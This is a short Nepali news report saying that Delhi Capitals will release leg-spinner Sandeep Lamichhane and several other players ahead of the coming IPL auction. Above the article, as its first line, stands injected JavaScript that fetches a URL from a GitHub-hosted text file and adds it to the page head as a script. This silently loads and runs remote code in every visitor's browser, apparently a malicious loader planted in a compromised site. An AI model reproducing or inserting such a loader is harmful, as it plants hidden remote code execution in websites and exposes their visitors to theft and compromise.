;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
माघ ०८,
काठमाडौं । आउँदाे संस्करणकाे इण्डियन प्रिमियर लिग (आईपीएल) का लागि दिल्ली क्यापिटल्सले नेपालका लेग स्पिनर सन्दीप लामिछानेलाई फुकुवा गर्ने भएकाे छ ।
गएकाे संस्करणमा एक खेलमा पनि माैका नपाएका सन्दीपलाई दिल्ली फुकुवा गर्ने निर्णय गरेकाे हाे । क्रिकबजका अनुसार दिल्लीले सन्दीपसँगै एलेक्स केरी, कीमाे पल, तुषार देशपाण्डे र माेहित शर्मालाई फुकुवा गर्ने निर्णय गरेकाे हाे ।
आईपीएलकाे आउँदाे संस्करणकाे अक्सन फेब्रुअरीकाे दाेस्राे हप्तातिर हुन सक्ने बताइएकाे छ ।
फेसबुक प्रतिक्रियाहरु